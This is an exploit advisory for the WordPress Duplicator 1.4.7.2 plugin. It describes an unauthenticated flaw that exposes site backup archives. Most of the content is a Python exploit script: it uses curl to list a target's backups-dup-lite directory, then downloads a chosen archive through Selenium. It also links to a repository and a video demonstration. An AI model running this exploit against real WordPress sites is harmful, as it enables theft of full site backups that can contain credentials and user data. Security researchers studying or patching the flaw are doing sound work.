WordPress Duplicator 1.4.7.2 Backup Disclosure

## Title: WordPress Plugin Duplicator 1.4.7.2 - Unauthenticated Backup Download## Author: nu11secur1ty## Date: 08.23.2022## Vendor: https://wordpress.org/## Software: https://wordpress.org/plugins/duplicator/## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Duplicator%20%E2%80%93%20WordPress-Migration-Plugin-1.4.7.2## Description:The WordPress Plugin Duplicator 1.4.7.2 suffers from UnauthenticatedBackup Download, after an update from the 1.4.7.1 version.The attacker can download all archive information from the system byusing this vulnerability!Status: CRITICAL[+] Exploit:```python#!/usr/bin/python# Author nu11secur1tyfrom selenium import webdriverimport timeimport osprint("Test if you can access the directory\n")time.sleep(5)os.system('curl http://pwned-host.com/wordpress/wp-content/backups-dup-lite/')target=input("Give the name of the archive...\n")driver = webdriver.Chrome()driver.get('http://pwned-host.com/wordpress/wp-content/backups-dup-lite/'+ target)```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Duplicator%20%E2%80%93%20WordPress-Migration-Plugin-1.4.7.2)## Proof and Exploit:[href](https://streamable.com/x0cvjh)